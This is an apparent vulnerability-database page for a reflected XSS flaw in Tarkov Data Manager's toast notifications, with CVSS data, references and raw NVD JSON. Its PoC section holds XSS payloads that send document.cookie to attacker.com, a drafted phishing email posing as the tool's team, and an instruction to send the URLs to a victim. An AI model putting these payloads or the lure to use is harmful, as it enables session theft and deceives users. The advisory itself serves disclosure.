CVE-2026-21855

Description

The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, a reflected Cross Site Scripting (XSS) vulnerability in the toast notification system allows any attacker to execute arbitrary JavaScript in the context of a victim's browser session by crafting a malicious URL. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities.

CVSS Details

CVSS Score

9.3

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:* - VULNERABLE

Tarkov Data Manager < 2025-01-02版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-21855 Reflected XSS PoC for Tarkov Data Manager
// Target: Tarkov Data Manager toast notification system
// CVSS: 9.3 (Critical)

// Malicious URL construction
const baseUrl = 'https://[tarkov-data-manager-host]/';
const xssPayload = '<script>alert(document.cookie)</script>';

// Method 1: Direct XSS via URL parameter
const maliciousUrl = baseUrl + '?message=' + encodeURIComponent(xssPayload);
console.log('Method 1 - Direct URL:', maliciousUrl);

// Method 2: XSS via toast notification parameter
const toastPayload = '" onerror="fetch(\'https://attacker.com/steal?c=\'+document.cookie)"';
const maliciousUrl2 = baseUrl + '?toast=' + encodeURIComponent(toastPayload);
console.log('Method 2 - Toast param:', maliciousUrl2);

// Method 3: XSS via notification system
const notificationPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">';
const maliciousUrl3 = baseUrl + '?notify=' + encodeURIComponent(notificationPayload);
console.log('Method 3 - Notification:', maliciousUrl3);

// Generate phishing email content
const emailContent = `
Click here to view your Tarkov item data:
${maliciousUrl}

Best regards,
Tarkov Data Manager Team
`;
console.log('Phishing email content:', emailContent);

// Display the PoC URLs
console.log('\n=== CVE-2026-21855 PoC ===' );
console.log('Please send one of these URLs to the victim:');
console.log(maliciousUrl);
console.log(maliciousUrl2);
console.log(maliciousUrl3);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21855
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21855
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21855/
[4] VulDB https://vuldb.com/cve/CVE-2026-21855
[5] https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-9c23-rrg9-jc89

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21855", "sourceIdentifier": "[email protected]", "published": "2026-01-07T19:15:57.970", "lastModified": "2026-02-03T16:20:50.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, a reflected Cross Site Scripting (XSS) vulnerability in the toast notification system allows any attacker to execute arbitrary JavaScript in the context of a victim's browser session by crafting a malicious URL. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities."}, {"lang": "es", "value": "El Tarkov Data Manager es una herramienta para gestionar los datos de ítems de Tarkov. Antes del 02 de enero de 2025, una vulnerabilidad de Cross Site Scripting (XSS) reflejado en el sistema de notificaciones 'toast' permite a cualquier atacante ejecutar JavaScript arbitrario en el contexto de la sesión del navegador de una víctima al crear una URL maliciosa. Una serie de 'commits' de corrección el 02 de enero de 2025 corrigió esta y otras vulnerabilidades."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-01-02", "matchCriteriaId": "1BED0E5B-BD43-4202-930F-9931EC05570C"}]}]}], "references": [{"url": "https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-9c23-rrg9-jc89", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}